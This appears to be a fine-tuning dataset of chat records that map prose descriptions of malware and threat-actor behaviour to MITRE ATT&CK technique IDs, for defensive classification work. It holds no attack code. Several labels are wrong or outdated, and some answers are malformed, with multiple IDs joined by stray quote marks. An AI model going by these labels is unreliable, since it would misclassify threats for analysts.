- "role": "user",
- "content": "Lazarus Group malware WhiskeyDelta-Two contains a function that attempts to rename the administrator’s account."
- },
- {
- "role": "assistant",
- "content": "T1098 - Account Manipulation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "InvisiMole can inject itself into another process to avoid detection including use of a technique called ListPlanting that customizes the sorting algorithm in a ListView structure."
- },
- {
- "role": "assistant",
- "content": "T1055 - Process Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Once it is encrypted using the XOR algorithm, the buffer is encoded with BASE64"
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Cobalt Strike can collect data from a local system."
- },
- {
- "role": "assistant",
- "content": "T1005 - Data from Local System"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "RegDuke can use control-flow flattening or the commercially available .NET Reactor for obfuscation."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Ryuk has attempted to adjust its token privileges to have the \"SeDebugPrivilege\"."
- },
- {
- "role": "assistant",
- "content": "T1134 - Access Token Manipulation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "After decoding their C2 server IP addresses, from obfuscated strings, both trojans will attempt to collect host information and send it to the C2 server."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "uses various WMI queries to check if the sample is running in a sandbox."
- },
- {
- "role": "assistant",
- "content": "T1047 - Windows Management Instrumentation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Anchor can determine the hostname and linux version on a compromised host."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Try to exploit the following Remote Code Execution vulnerabilities in the targeted servers: a) CVE-2012-0874: JBoss Enterprise Application Platform Multiple Security Bypass Vulnerabilities b) CVE-2010-1871: JBoss Seam Framework remote code execution c) JBoss AS 3/4/5/6: Remote Command Execution (exploit) d) CVE-2017-10271: Oracle WebLogic wls-wsat Component Deserialization RCE e) CVE-2018-2894: Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware"
- },
- {
- "role": "assistant",
- "content": "T1203 - Exploitation for Client Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BITTER has exploited Microsoft Office vulnerabilities CVE-2012-0158, CVE-2017-11882, CVE-2018-0798, and CVE-2018-0802."
- },
- {
- "role": "assistant",
- "content": "T1203 - Exploitation for Client Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "beacons to destination port 443."
- },
- {
- "role": "assistant",
- "content": "T1043 - Commonly Used Port"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Some samples use cmd.exe to delete temporary files."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "contains the readFiles function to return a detailed listing (sometimes recursive) of a specified directory."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT33 has obtained and leveraged publicly-available tools for early intrusion activities."
- },
- {
- "role": "assistant",
- "content": "T1588.002 - Tool"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "menuPass has staged data on remote MSP systems or other victim networks prior to exfiltration."
- },
- {
- "role": "assistant",
- "content": "T1074.002 - Remote Data Staging"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ServHelper will attempt to enumerate Windows version and system architecture."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Downdelph uses search order hijacking of the Windows executable sysprep.exe to escalate privileges."
- },
- {
- "role": "assistant",
- "content": "T1574.001 - Hijack Execution Flow: DLL Search Order Hijacking"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Sandworm Team's VBS backdoor can decode Base64-encoded data and save it to the %TEMP% folder. The group also decrypted received information using the Triple DES algorithm and decompresses it using GZip."
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "uses search order hijacking of the Windows executable sysprep.exe to escalate privileges."
- },
- {
- "role": "assistant",
- "content": "T1574.001 - Hijack Execution Flow: DLL Search Order Hijacking"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Ramsay has been executed through malicious e-mail attachments."
- },
- {
- "role": "assistant",
- "content": "T1204.002 - User Execution: Malicious File"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "calls cmd.exe to run various DLL files via rundll32."
- },
- {
- "role": "assistant",
- "content": "T1218.011 - Signed Binary Proxy Execution: Rundll32"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "GoldenSpy's setup file installs initial executables under the folder \"%WinDir%\\System32\\PluginManager\"."
- },
- {
- "role": "assistant",
- "content": "T1036.005 - Masquerading: Match Legitimate Name or Location"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "In such a situation, the malware will find and run the built-in Microsoft Windows InfDefaultInstall.exe program, which will install a DLL via an INF file. Should Tencent be installed, the malware will execute the InfDefaultInstall.exe program with an argument of ‘QQMgr.inf’. Otherwise, it will use ‘hccutils.inf’ as an argument"
- },
- {
- "role": "assistant",
- "content": "T1574.002 - Hijack Execution Flow: DLL Side-Loading"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The malware operates on victims’ systems as a svchost-based service and is capable of downloading executables, changing its own configuration, updating its own binaries, terminating its own processes, and activating and terminating denial-of-service attacks"
- },
- {
- "role": "assistant",
- "content": "T1543 - Create or Modify System Process', 'T1543.003 - Create or Modify System Process: Windows Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "creates a shortcut file and saves it in a Startup folder to establish persistence."
- },
- {
- "role": "assistant",
- "content": "T1547.009 - Boot or Logon Autostart Execution: Shortcut Modification', 'T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "performs operating system information discovery using systeminfo."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "InvisiMole can sort and collect specific documents as well as generate a list of all files on a newly inserted drive and store them in an encrypted file."
- },
- {
- "role": "assistant",
- "content": "T1119 - Automated Collection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Melcoz can monitor content saved to the clipboard."
- },
- {
- "role": "assistant",
- "content": "T1115 - Clipboard Data"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "encodes C2 beacons using XOR."
- },
- {
- "role": "assistant",
- "content": "T1573 - Encrypted Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT1 listed connected network shares."
- },
- {
- "role": "assistant",
- "content": "T1135 - Network Share Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Mustang Panda's PlugX variant has created a hidden folder on USB drives named \"RECYCLE.BIN\" to store malicious executables and collected data."
- },
- {
- "role": "assistant",
- "content": "T1564.001 - Hide Artifacts: Hidden Files and Directories"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "JHUHUGIT has registered itself as a scheduled task to run each time the current user logs in."
- },
- {
- "role": "assistant",
- "content": "T1053.005 - Scheduled Task/Job: Scheduled Task"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "creates a directory, %USERPROFILE%\\AppData\\Local\\SKC\\, which is used to store collected log files."
- },
- {
- "role": "assistant",
- "content": "T1074 - Data Staged"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Finally, the attacker added their own devices as allowed IDs for active sync for a number of mailboxes using Set-CASMailbox"
- },
- {
- "role": "assistant",
- "content": "T1098.005 - Device Registration', 'T1098.002 - Account Manipulation: Additional Email Delegate Permissions"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "This tactic uses public web services to host content that contains encoded commands that are decoded by the malware"
- },
- {
- "role": "assistant",
- "content": "T1102 - Web Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "QuietSieve can download and execute payloads on a target host."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "In February 2013, AlienVault performed analysis on the CallMe Trojan and found that it is based on a tool called Tiny SHell, an OSX shell tool whose source code is available on the Internet. The Trojan uses AES to encrypt the communication channel its C2 server, which will provide one of three commands to carry out activities on the compromised system, as seen in Table 4"
- },
- {
- "role": "assistant",
- "content": "T1059.004 - Command and Scripting Interpreter: Bash', 'T1573.001 - Symmetric Cryptography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "AppleJeus has added a leading \".\" to plist filenames, unlisting them from the Finder app and default Terminal directory listings."
- },
- {
- "role": "assistant",
- "content": "T1564.001 - Hide Artifacts: Hidden Files and Directories"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Gallmaker attempted to exploit Microsoft’s DDE protocol in order to gain access to victim machines and for execution."
- },
- {
- "role": "assistant",
- "content": "T1559.002 - Inter-Process Communication: Dynamic Data Exchange"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Earth Lusca has manipulated legitimate websites to inject malicious JavaScript code as part of their watering hole operations."
- },
- {
- "role": "assistant",
- "content": "T1059.007 - Command and Scripting Interpreter: JavaScript"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SombRAT can SSL encrypt C2 traffic."
- },
- {
- "role": "assistant",
- "content": "T1573.002 - Asymmetric Cryptography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "searches through Outlook files and directories (e.g., inbox, sent, templates, drafts, archives, etc.)."
- },
- {
- "role": "assistant",
- "content": "T1114 - Email Collection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Hildegard uses LD_PRELOAD to hide the malicious process launched inside the containers. The malware modified the /etc/ld.so.preload file to intercept shared libraries’ imported functions"
- },
- {
- "role": "assistant",
- "content": "T1574.006 - Hijack Execution Flow: LD_PRELOAD"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PLAINTEE performs the \"tasklist\" command to list running processes."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Several Lazarus Group malware families collect information on the type and version of the victim OS, as well as the victim computer name and CPU information. A Destover-like variant used by Lazarus Group also collects disk space information and sends it to its C2 server."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Lazarus Group has digitally signed malware and utilities to evade detection."
- },
- {
- "role": "assistant",
- "content": "T1553.002 - Code Signing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "deletes the Registry key HKCU\\Software\\Classes\\Applications\\rundll32.exe\\shell\\open."
- },
- {
- "role": "assistant",
- "content": "T1112 - Modify Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "For FIN7 attack routines, data can be compressed and/or encrypted before being exfiltrated."
- },
- {
- "role": "assistant",
- "content": "T1560 - Archive Collected Data"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "GuLoader can use a number of different APIs for discovery and execution."
- },
- {
- "role": "assistant",
- "content": "T1106 - Native API"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "During Operation CuckooBees, attackers used a signed kernel rootkit to establish additional persistence."
- },
- {
- "role": "assistant",
- "content": "T1547.006 - Boot or Logon Autostart Execution: Kernel Modules and Extensions"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Helminth has used Tasklist to get information on processes."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Volgmer uses a simple XOR cipher to encrypt traffic and files."
- },
- {
- "role": "assistant",
- "content": "T1573.001 - Symmetric Cryptography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Chinese state-sponsored cyber actors used RDP and execute rdpclip.exe to exfiltrate information from the clipboard."
- },
- {
- "role": "assistant",
- "content": "T1115 - Clipboard Data"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has obfuscated strings in by base64 encoding, and then encrypting them."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FunnyDream can execute commands, including gathering user information, and send the results to C2."
- },
- {
- "role": "assistant",
- "content": "T1041 - Exfiltration Over C2 Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Umbreon provides additional access using its backdoor Espeon, providing a reverse shell upon receipt of a special packet"
- },
- {
- "role": "assistant",
- "content": "T1205 - Traffic Signaling"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Shark can delete files downloaded to the compromised host."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "menuPass has been seen changing malicious files to appear legitimate."
- },
- {
- "role": "assistant",
- "content": "T1036.005 - Masquerading: Match Legitimate Name or Location"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BloodHound can collect password policy information on the target environment."
- },
- {
- "role": "assistant",
- "content": "T1201 - Password Policy Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can identify logged in users across the domain and views user sessions."
- },
- {
- "role": "assistant",
- "content": "T1033 - System Owner/User Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Cisco Talos has discovered a new malware campaign based on a previously unknown family we're calling \"PoetRAT. The droppers are Microsoft Word documents that deploy a Python-based remote access trojan (RAT). We named this malware PoetRAT due to the various references to William Shakespeare, an English poet and playwright. The RAT has all the standard features of this kind of malware, providing full control of the compromised system to the operation. For exfiltration, it uses FTP, which denotes an intention to transfer large amounts of data. The campaign shows us that the operators manually pushed additional tools when they needed them on the compromised systems. We will describe a couple of these tools. The most interesting is a tool used to monitor the hard disk and exfiltrate data automatically. Besides these, there are keyloggers, browser-focused password stealers, camera control applications, and other generic password stealers"
- },
- {
- "role": "assistant",
- "content": "T1555.003 - Credentials from Password Stores: Credentials from Web Browsers"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BRONZE BUTLER has used \"net time\" to check the local time on a target system."
- },
- {
- "role": "assistant",
- "content": "T1124 - System Time Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The ‘microsoft-cache’ domain was used by the malware variant that communicated over HTTP. We found four unique samples communicating with this domain, which resolved to the same Hong Kong-based IP address used by the first two domains"
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT39 has utilized AutoIt and custom scripts to perform internal reconnaissance."
- },
- {
- "role": "assistant",
- "content": "T1059 - Command and Scripting Interpreter"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT41 compromised an online billing/payment service using VPN access between a third-party service provider and the targeted payment service."
- },
- {
- "role": "assistant",
- "content": "T1133 - External Remote Services"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PolyglotDuke can be executed using rundll32.exe."
- },
- {
- "role": "assistant",
- "content": "T1218.011 - Signed Binary Proxy Execution: Rundll32"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Taidoor has used HTTP GET and POST requests for C2."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "During Frankenstein, the threat actors used a script that ran WMI queries to check if a VM or sandbox was running, including VMWare and Virtualbox. The script would also call WMI to determine the number of cores allocated to the system; if less than two the script would stop execution."
- },
- {
- "role": "assistant",
- "content": "T1497.001 - Virtualization/Sandbox Evasion: System Checks"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The dropper copies the system file rundll32.exe to the install location for the malware, then uses the copy of rundll32.exe to load and execute the main component."
- },
- {
- "role": "assistant",
- "content": "T1218.011 - Signed Binary Proxy Execution: Rundll32"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SLOTHFULMEDIA has collected the username from a victim machine."
- },
- {
- "role": "assistant",
- "content": "T1033 - System Owner/User Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Kwampirs collects a list of active and listening connections by using the command \"netstat -nao\" as well as a list of available network mappings with \"net use\"."
- },
- {
- "role": "assistant",
- "content": "T1049 - System Network Connections Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Bandook has a command to delete a file."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Zox has the ability to leverage local and remote exploits to escalate privileges."
- },
- {
- "role": "assistant",
- "content": "T1068 - Exploitation for Privilege Escalation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Table 4: URL parameters Additionally, the command string is hashed using the same RGPH hashing algorithm as before"
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can obtain information about security software on the victim."
- },
- {
- "role": "assistant",
- "content": "T1518.001 - Software Discovery: Security Software Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
